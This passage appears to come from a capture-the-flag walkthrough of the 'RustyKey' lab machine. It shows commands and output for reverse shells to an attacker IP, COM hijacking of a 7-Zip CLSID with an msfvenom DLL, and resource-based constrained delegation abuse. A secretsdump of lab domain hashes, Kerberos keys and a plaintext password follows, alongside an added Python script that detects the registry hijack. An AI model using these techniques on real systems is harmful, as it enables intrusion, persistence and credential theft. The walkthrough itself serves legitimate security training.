*Evil-WinRM* PS C:\windows\Temp> .\RunasCS.exe ee.reed Admin123! powershell.exe -r 10.10.14.46:6666
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-39ffe$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3248 created in background.
You then get a shell as the ee.reed user:
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.11.75] 63944
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
rustykey\ee.reed
2.5. COM Hijacking
References:
- Event Triggered Execution: Component Object Model Hijacking, Sub-technique T1546.015 - Enterprise | MITRE ATT&CK®
- Persistence – COM Hijacking – Penetration Testing Lab
- Persistence: "the continued or prolonged existence of something": Part 2 - COM Hijacking - MDSec
The email mentioned archiving functionality such as compression, so let's first check whether a related application is installed.
7-Zip is installed:
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |
Select-Object DisplayName, DisplayVersion, Publisher, InstallDate |
Where-Object { $_.DisplayName } |
Sort-Object DisplayName
DisplayName DisplayVersion Publisher InstallDate
----------- -------------- --------- -----------
7-Zip 24.09 (x64) 24.09 Igor Pavlov
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 14.36.32532 Microsoft Corporation 20241226
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 14.36.32532 Microsoft Corporation 20241226
VMware Tools 12.4.5.23787635 VMware, Inc. 20241226
Generate a DLL payload, start a listener, and then, as ee.reed (who holds the extended registry permission), point the InprocServer32 default value of the 7-Zip CLSID at the DLL:
msfvenom -p windows/x64/exec CMD='powershell.exe -nop -w hidden -e <base64-encoded payload>' EXITFUNC=none -f dll > 4466.dll
rlwrap nc -lnvp 4466
$targetCLSID = 'HKLM:\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32'
Set-ItemProperty -Path $targetCLSID -Name '(default)' -Value 'C:\tmp\4466.dll'
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 4466
listening on [any] 4466 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.11.75] 57297
PS C:\Windows> whoami
rustykey\mm.turner
PS C:\Windows>
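Detection of the InprocServer32 redirect shown above, as an added example that is not part of the writeup. Sysmon Event ID 13 (RegistryEvent, Value Set) records every write to a CLSID's InprocServer32 default value; the script below checks such records against a baseline and flags a DLL outside the Windows or Program Files directories, a per-user (HKU) entry shadowing the machine-wide registration, and any deviation from the recorded path. The CLSID is the 7-Zip one from this section; the baseline DLL path, SID, process images and timestamps are constructed or assumed, not read from the box.

```python
import re

# Sysmon Event ID 13 (RegistryEvent, Value Set): TargetObject is the registry path as Sysmon
# writes it (HKLM\... or HKU\<SID>\...), Details is the value that was written.
INPROC_DEFAULT_RE = re.compile(
    r"^(?P<hive>HKLM|HKU\\[^\\]+)\\SOFTWARE\\Classes\\CLSID\\"
    r"(?P<clsid>\{[0-9A-Fa-f-]{36}\})\\InprocServer32\\\(Default\)$",
    re.IGNORECASE,
)

# Directories a COM server DLL registered machine-wide is normally loaded from.
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def normalize_dll_path(details: str) -> str:
    """Lower-case the path, drop quotes and expand %SystemRoot% so prefix checks are reliable."""
    path = details.strip().strip('"').lower()
    return path.replace("%systemroot%", "c:\\windows")


def check_inprocserver_events(events, baseline):
    """Flag InprocServer32 default-value writes that look like COM hijacking.

    baseline maps CLSID -> DLL path recorded when the software was installed.
    Reasons, in the order they are appended:
      user-hive-override  a per-user CLSID entry shadows the machine-wide registration
      untrusted-dll-path  DLL outside the Windows / Program Files directories
      dll-path-changed    DLL differs from the recorded baseline for this CLSID
    """
    findings = []
    for ev in events:
        if ev["EventID"] != 13:
            continue
        m = INPROC_DEFAULT_RE.match(ev["TargetObject"])
        if not m:
            continue
        clsid = m.group("clsid").upper()
        dll = normalize_dll_path(ev["Details"])
        reasons = []
        if m.group("hive").upper() != "HKLM":
            reasons.append("user-hive-override")
        if not dll.startswith(TRUSTED_DLL_DIRS):
            reasons.append("untrusted-dll-path")
        expected = baseline.get(clsid)
        if expected is not None and normalize_dll_path(expected) != dll:
            reasons.append("dll-path-changed")
        if reasons:
            findings.append({"time": ev["UtcTime"], "clsid": clsid, "hive": m.group("hive"),
                             "image": ev["Image"], "dll": dll, "reasons": reasons})
    return findings


# Constructed baseline: the 7-Zip shell extension CLSID from this section and the DLL path
# its installer is assumed to register (not read from a real system).
BASELINE = {"{23170F69-40C1-278A-1000-000100020000}": r"C:\Program Files\7-Zip\7-zip.dll"}

MACHINE_KEY = (r"HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}"
               r"\InprocServer32\(Default)")
USER_KEY = (r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1139\SOFTWARE\Classes\CLSID"
            r"\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\(Default)")

# Constructed Sysmon records: an installer writing the expected path, the redirect from this
# section, a per-user shadow entry, and an unrelated registry write.
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2024-12-26 10:30:01.110", "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": MACHINE_KEY, "Details": r"C:\Program Files\7-Zip\7-zip.dll"},
    {"EventID": 13, "UtcTime": "2025-06-30 01:40:12.532",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": MACHINE_KEY, "Details": r"C:\tmp\4466.dll"},
    {"EventID": 13, "UtcTime": "2025-06-30 01:52:48.004", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": USER_KEY, "Details": r"C:\Users\bb.morgan\AppData\Local\Temp\shell.dll"},
    {"EventID": 13, "UtcTime": "2025-06-30 02:00:00.000", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Program Files\Vendor\updater.exe"},
]

if __name__ == "__main__":
    for f in check_inprocserver_events(SAMPLE_EVENTS, BASELINE):
        print(f["time"], f["hive"], f["clsid"], f["dll"], ",".join(f["reasons"]))
```

Sysmon only produces these records if its configuration contains a RegistryEvent rule covering the CLSID\...\InprocServer32 paths; without such a rule the write that gave mm.turner's shell in this section leaves no trace beyond the registry value itself.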
2.6. RBCD
From the mm.turner shell (BloodHound showed that MM.TURNER can configure RBCD on DC.RUSTYKEY.HTB), allow IT-COMPUTER3$ to delegate to the DC, then request a service ticket impersonating backupadmin:
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc smb dc.rustykey.htb -u backupadmin -k --use-kcache
SMB dc.rustykey.htb 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.rustykey.htb 445 dc [+] rustykey.htb\backupadmin from ccache (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-smbexec -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type c:\users\administrator\desktop\root.txt
c23d2704***********************
The NTDS.dit secrets can also be dumped:
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-secretsdump -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword
RUSTYKEY\Administrator:Rustyrc4key#!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x3c06efaf194382750e12c00cd141d275522d8397
dpapi_userkey:0xb833c05f4c4824a112f04f2761df11fefc578f5c
[*] NL$KM
0000 6A 34 14 2E FC 1A C2 54 64 E3 4C F1 A7 13 5F 34 j4.....Td.L..._4
0010 79 98 16 81 90 47 A1 F0 8B FC 47 78 8C 7B 76 B6 y....G....Gx.{v.
0020 C0 E4 94 9D 1E 15 A6 A9 70 2C 13 66 D7 23 A1 0B ........p,.f.#..
0030 F1 11 79 34 C1 8F 00 15 7B DF 6F C7 C3 B4 FC FE ..y4....{.o.....
NL$KM:6a34142efc1ac25464e34cf1a7135f34799816819047a1f08bfc47788c7b76b6c0e4949d1e15a6a9702c1366d723a10bf1117934c18f00157bdf6fc7c3b4fcfe
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7a351e12f70cc177a1d5bd11b28ac26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4ad30fa8d8f2cfa198edd4301e5b0f3:::
rustykey.htb\rr.parker:1137:aad3b435b51404eeaad3b435b51404ee:d0c72d839ef72c7d7a2dae53f7948787:::
rustykey.htb\mm.turner:1138:aad3b435b51404eeaad3b435b51404ee:7a35add369462886f2b1f380ccec8bca:::
rustykey.htb\bb.morgan:1139:aad3b435b51404eeaad3b435b51404ee:44c72edbf1d64dc2ec4d6d8bc24160fc:::
rustykey.htb\gg.anderson:1140:aad3b435b51404eeaad3b435b51404ee:93290d859744f8d07db06d5c7d1d4e41:::
rustykey.htb\dd.ali:1143:aad3b435b51404eeaad3b435b51404ee:20e03a55dcf0947c174241c0074e972e:::
rustykey.htb\ee.reed:1145:aad3b435b51404eeaad3b435b51404ee:8432ec4c4f9b9ce96b73a6451a1d9dcc:::
rustykey.htb\nn.marcos:1146:aad3b435b51404eeaad3b435b51404ee:33aa36a7ec02db5f2ec5917ee544c3fa:::
rustykey.htb\backupadmin:3601:aad3b435b51404eeaad3b435b51404ee:34ed39bc39d86932b1576f23e66e3451:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
Support-Computer1$:1103:aad3b435b51404eeaad3b435b51404ee:5014a29553f70626eb1d1d3bff3b79e2:::
Support-Computer2$:1104:aad3b435b51404eeaad3b435b51404ee:613ce90991aaeb5187ea198c629bbf32:::
Support-Computer3$:1105:aad3b435b51404eeaad3b435b51404ee:43c00d56ff9545109c016bbfcbd32bee:::
Support-Computer4$:1106:aad3b435b51404eeaad3b435b51404ee:c52b0a68cb4e24e088164e2e5cf2b98a:::
Support-Computer5$:1107:aad3b435b51404eeaad3b435b51404ee:2f312c564ecde3769f981c5d5b32790a:::
Finance-Computer1$:1118:aad3b435b51404eeaad3b435b51404ee:d6a32714fa6c8b5e3ec89d4002adb495:::
Finance-Computer2$:1119:aad3b435b51404eeaad3b435b51404ee:49c0d9e13319c1cb199bc274ee14b04c:::
Finance-Computer3$:1120:aad3b435b51404eeaad3b435b51404ee:65f129254bea10ac4be71e453f6cabca:::
Finance-Computer4$:1121:aad3b435b51404eeaad3b435b51404ee:ace1db31d6aeb97059bf3efb410df72f:::
Finance-Computer5$:1122:aad3b435b51404eeaad3b435b51404ee:b53f4333805f80406b4513e60ef83457:::
IT-Computer1$:1123:aad3b435b51404eeaad3b435b51404ee:fe60afe8d9826130f0e06cd2958a8a61:::
IT-Computer2$:1124:aad3b435b51404eeaad3b435b51404ee:73d844e19c8df244c812d4be1ebcff80:::
IT-Computer3$:1125:aad3b435b51404eeaad3b435b51404ee:b52b582f02f8c0cd6320cd5eab36d9c6:::
IT-Computer4$:1126:aad3b435b51404eeaad3b435b51404ee:763f9ea340ccd5571c1ffabf88cac686:::
IT-Computer5$:1127:aad3b435b51404eeaad3b435b51404ee:1679431d1c52638688b4f1321da14045:::
[*] Kerberos keys grabbed
Administrator:des-cbc-md5:e007705d897310cd
krbtgt:aes256-cts-hmac-sha1-96:ee3271eb3f7047d423c8eeaf1bd84f4593f1f03ac999a3d7f3490921953d542a
krbtgt:aes128-cts-hmac-sha1-96:24465a36c2086d6d85df701553a428af
krbtgt:des-cbc-md5:d6d062fd1fd32a64
rustykey.htb\rr.parker:des-cbc-md5:8c5b3b54b9688aa1
rustykey.htb\mm.turner:aes256-cts-hmac-sha1-96:707ba49ed61c6575bfe9a3fd1541fc008e8803bfb0d7b5d21122cc464f39cbb9
rustykey.htb\mm.turner:aes128-cts-hmac-sha1-96:a252d2716a0b365649eaec02f84f12c8
rustykey.htb\mm.turner:des-cbc-md5:a46ea77c13854945
rustykey.htb\bb.morgan:des-cbc-md5:d6ef5e57a2abb93b
rustykey.htb\gg.anderson:des-cbc-md5:8923850da84f2c0d
rustykey.htb\dd.ali:des-cbc-md5:613da45e3bef34a7
rustykey.htb\ee.reed:des-cbc-md5:08e0862aec809ea8
rustykey.htb\nn.marcos:aes256-cts-hmac-sha1-96:53ee5251000622bf04e80b5a85a429107f8284d9fe1ff5560a20ec8626310ee8
rustykey.htb\nn.marcos:aes128-cts-hmac-sha1-96:cf00314169cb7fea67cfe8e0f7925a43
rustykey.htb\nn.marcos:des-cbc-md5:e358835b1c238661
rustykey.htb\backupadmin:des-cbc-md5:625e25fe70a77358
DC$:des-cbc-md5:915d9d52a762675d
Support-Computer1$:aes256-cts-hmac-sha1-96:89a52d7918588ddbdae5c4f053bbc180a41ed703a30c15c5d85d123457eba5fc
Support-Computer1$:aes128-cts-hmac-sha1-96:3a6188fdb03682184ff0d792a81dd203
Support-Computer1$:des-cbc-md5:c7cb8a76c76dfed9
Support-Computer2$:aes256-cts-hmac-sha1-96:50f8a3378f1d75df813db9d37099361a92e2f2fb8fcc0fc231fdd2856a005828
Support-Computer2$:aes128-cts-hmac-sha1-96:5c3fa5c32427fc819b10f9b9ea4be616
Support-Computer2$:des-cbc-md5:a2a202ec91e50b6d
Support-Computer3$:aes256-cts-hmac-sha1-96:e3b7b8876ac617dc7d2ba6cd2bea8de74db7acab2897525dfd284c43c8427954
Support-Computer3$:aes128-cts-hmac-sha1-96:1ea036e381f3279293489c19cfdeb6c1
Support-Computer3$:des-cbc-md5:c13edcfe4676f86d
Support-Computer4$:aes256-cts-hmac-sha1-96:1708c6a424ed59dedc60e980c8f2ab88f6e2bb1bfe92ec6971c8cf5a40e22c1e
Support-Computer4$:aes128-cts-hmac-sha1-96:9b6d33ef93c69721631b487dc00d3047
Support-Computer4$:des-cbc-md5:3b79647680e0d57a
Support-Computer5$:aes256-cts-hmac-sha1-96:464551486df4086accee00d3d37b60de581ee7adad2a6a31e3730fad3dfaed42
Support-Computer5$:aes128-cts-hmac-sha1-96:1ec0c93b7f9df69ff470e2e05ff4ba89
Support-Computer5$:des-cbc-md5:73abb53162d51fb3
Finance-Computer1$:aes256-cts-hmac-sha1-96:a57ce3a3e4ee34bc08c8538789fa6f99f5e8fb200a5f77741c5bf61b3d899918
Finance-Computer1$:aes128-cts-hmac-sha1-96:e62b7b772aba6668af65e9d1422e6aea
Finance-Computer1$:des-cbc-md5:d9914cf29e76f8df
Finance-Computer2$:aes256-cts-hmac-sha1-96:4d45b576dbd0eab6f4cc9dc75ff72bffe7fae7a2f9dc50b5418e71e8dc710703
Finance-Computer2$:aes128-cts-hmac-sha1-96:3fd0dd200120ca90b43af4ab4e344a78
Finance-Computer2$:des-cbc-md5:23ef512fb3a8d37c
Finance-Computer3$:aes256-cts-hmac-sha1-96:1b2280d711765eb64bdb5ab1f6b7a3134bc334a3661b3335f78dd590dee18b0d
Finance-Computer3$:aes128-cts-hmac-sha1-96:a25859c88f388ae7134b54ead8df7466
Finance-Computer3$:des-cbc-md5:2a688a43ab40ecba
Finance-Computer4$:aes256-cts-hmac-sha1-96:291adb0905f3e242748edd1c0ecaab34ca54675594b29356b90da62cf417496f
Finance-Computer4$:aes128-cts-hmac-sha1-96:81fed1f0eeada2f995ce05bbf7f8f951
Finance-Computer4$:des-cbc-md5:6b7532c83bc84c49
Finance-Computer5$:aes256-cts-hmac-sha1-96:6171c0240ae0ce313ecbd8ba946860c67903b12b77953e0ee38005744507e3de
Finance-Computer5$:aes128-cts-hmac-sha1-96:8e6aa26b24cdda2d7b5474b9a3dc94dc
Finance-Computer5$:des-cbc-md5:92a72f7f865bb6cd
IT-Computer1$:aes256-cts-hmac-sha1-96:61028ace6c840a6394517382823d6485583723f9c1f98097727ad3549d833b1e
IT-Computer1$:aes128-cts-hmac-sha1-96:7d1a98937cb221fee8fcf22f1a16b676
IT-Computer1$:des-cbc-md5:019d29370ece8002
IT-Computer2$:aes256-cts-hmac-sha1-96:e9472fb1cf77df86327e5775223cf3d152e97eebd569669a6b22280316cf86fa
IT-Computer2$:aes128-cts-hmac-sha1-96:a80fba15d78f66477f0591410a4ffda7
IT-Computer2$:des-cbc-md5:622f2ae961abe932
IT-Computer3$:aes256-cts-hmac-sha1-96:7871b89896813d9e4a732a35706fe44f26650c3da47e8db4f18b21cfbb7fbecb
IT-Computer3$:aes128-cts-hmac-sha1-96:0e14a9e6fd52ab14e36703c1a4c542e3
IT-Computer3$:des-cbc-md5:f7025180cd23e5f1
IT-Computer4$:aes256-cts-hmac-sha1-96:68f2e30ca6b60ec1ab75fab763087b8772485ee19a59996a27af41a498c57bbc
IT-Computer4$:aes128-cts-hmac-sha1-96:181ffb2653f2dc5974f2de924f0ac24a
IT-Computer4$:des-cbc-md5:bf58cb437340cd3d
IT-Computer5$:aes256-cts-hmac-sha1-96:417a87cdc95cb77997de6cdf07d8c9340626c7f1fbd6efabed86607e4cfd21b8
IT-Computer5$:aes128-cts-hmac-sha1-96:873fd89f24e79dcd0affe6f63c51ec9a
IT-Computer5$:des-cbc-md5:ad5eec6bcd4f86f7
3. Beyond Root
3.1. SeDenyNetworkLogonRight
The ee.reed user is in the Remote Management Users group but cannot log in, because the account is restricted by SeDenyNetworkLogonRight.
This restriction comes from Local Security Policy or Group Policy (GPO).
You can check it as follows:
secedit /export /cfg C:\ProgramData\secpol.cfg
cat C:\ProgramData\secpol.cfg | select-string "SeDenyNetworkLogonRight"